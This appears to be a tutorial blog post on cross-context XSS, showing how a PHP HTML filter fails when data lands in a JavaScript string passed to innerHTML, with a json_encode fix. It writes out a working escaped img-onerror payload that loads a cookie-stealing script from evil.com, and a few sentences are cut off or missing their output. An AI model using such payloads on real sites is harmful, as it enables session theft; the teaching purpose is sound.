The problem I'll talk about today deals with the ways quotes can be represented in different contexts, particularly when passing data across language boundaries. Let's look at some code.
    <?php $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS); ?>
    <script>
    var s = "<?php echo $s; ?>";
    var div = document.getElementById("content");
    div.innerHTML = s;
    </script>

From the HTML perspective, this code appears clean. Data from the URL parameter s needs to be written out to HTML, and we're applying a suitable filter to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.
s. The output of our PHP becomes:
What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence, innerHTML is to HTML what eval is to JavaScript.
When assigned to the innerHTML, it turns into the following HTML:
    <script src="http://evil.com/cookie-steal.js"></script>

Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however, execute inline event handlers on elements added through innerHTML, so we do this instead:
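    \u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e

which translates to the following HTML (indented for readability):

    <img src=blah
         onerror="s=document.createElement('script');
                  s.src='http://evil.com/cookie-steal.js';
                  document.body.appendChild(s);">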
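The decoding step can be reproduced outside a browser. What follows is a minimal sketch, not the real PHP filter: sanitizeSpecialChars is a hypothetical JavaScript approximation of FILTER_SANITIZE_SPECIAL_CHARS, and new Function stands in for the browser parsing the script block. It shows that the filter has nothing to encode in the payload, and that the JavaScript parser then turns the escapes back into HTML metacharacters.

```javascript
// Hypothetical stand-in for PHP's FILTER_SANITIZE_SPECIAL_CHARS (an approximation):
// it encodes ' " < > & and control characters below ASCII 32 as numeric entities.
function sanitizeSpecialChars(input) {
  return input.replace(/[\x00-\x1f'"<>&]/g, (ch) => "&#" + ch.charCodeAt(0) + ";");
}

// URL-decoded value of the s parameter ("+" in a query string means a space).
const param =
  "\\u003cimg src\\u003dblah onerror\\u003d\\u0022" +
  "s=document.createElement(\\u0027script\\u0027);" +
  "s.src\\u003d\\u0027http://evil.com/cookie-steal.js\\u0027;" +
  "document.body.appendChild(s);\\u0022\\u003e";

// Backslashes, letters and digits are not special in HTML, so nothing changes.
const filtered = sanitizeSpecialChars(param);

// Mimic the browser parsing `var s = "<filtered>";` as JavaScript source.
// new Function only evaluates the string literal here; no DOM is involved.
const decoded = new Function('return "' + filtered + '";')();

console.log(filtered === param); // true: the filter passed the payload through
console.log(decoded);            // the <img ... onerror="..."> markup
```

The point of the sketch is that the two languages disagree about which characters are dangerous: the HTML filter sees harmless text, while the JavaScript parser sees escape sequences.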
So, what's the fix here?
To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
    <?php $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS); ?>
    <script>
    var s = <?php echo json_encode($s); ?>;
    var div = document.getElementById("content");
    div.innerHTML = s;
    </script>

The
\\u00xx. Note that addslashes is insufficient as it does not escape newline characters, which are valid inside PHP strings.
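The newline problem is easy to see in isolation. The sketch below is an illustration under assumptions: addSlashes is a hypothetical JavaScript port of PHP's addslashes (it escapes single quotes, double quotes, backslashes and NUL, nothing else), and JSON.stringify stands in for json_encode. The two JSON encoders differ in details (PHP also escapes / by default, for instance), but both produce a complete, valid string literal.

```javascript
// Hypothetical JavaScript port of PHP's addslashes, for illustration only:
// it backslash-escapes ' " \ and turns NUL into \0, and nothing else.
function addSlashes(input) {
  return input.replace(/[\\'"]/g, "\\$&").replace(/\0/g, "\\0");
}

// Check whether `return <literal>;` parses as JavaScript source.
function parsesAsLiteral(literal) {
  try {
    new Function("return " + literal + ";");
    return true;
  } catch (err) {
    return false; // SyntaxError: the literal is malformed
  }
}

const value = "line one\nline two";

// addslashes-style: we add the quotes ourselves, the raw newline stays in the source.
const viaAddSlashes = '"' + addSlashes(value) + '"';

// JSON-style: quotes are part of the output and the newline becomes \n.
const viaJson = JSON.stringify(value);

console.log(parsesAsLiteral(viaAddSlashes)); // false
console.log(parsesAsLiteral(viaJson));       // true
```

A raw line break inside a quoted JavaScript string is a syntax error, so the addslashes version breaks the whole script block as soon as the value contains a newline.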
Two things to learn from this:
- When passing untrusted data across language boundaries, you may need to sanitize it multiple times
- innerHTML is the eval of HTML
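As a sketch of the first point, here is what a second round of sanitizing could look like on the JavaScript side, right before the innerHTML assignment. The escapeHtml helper is hypothetical and not part of the original code, and whether you need it depends on whether the value is meant to be shown as text or as markup.

```javascript
// Hypothetical helper: escape the five HTML metacharacters so that a string
// renders as plain text when assigned to innerHTML.
function escapeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// The value as JavaScript sees it once the \u003c... escapes have been decoded
// (shortened payload, for illustration).
const decodedValue = '<img src=blah onerror="alert(1)">';
const safe = escapeHtml(decodedValue);

// In a browser the assignment would then use the escaped value.
if (typeof document !== "undefined") {
  const div = document.getElementById("content");
  if (div) div.innerHTML = safe;
}

console.log(safe); // &lt;img src=blah onerror=&quot;alert(1)&quot;&gt;
```

The escaping happens at the last boundary the data crosses, which is the only place where we know for sure which language will interpret it next.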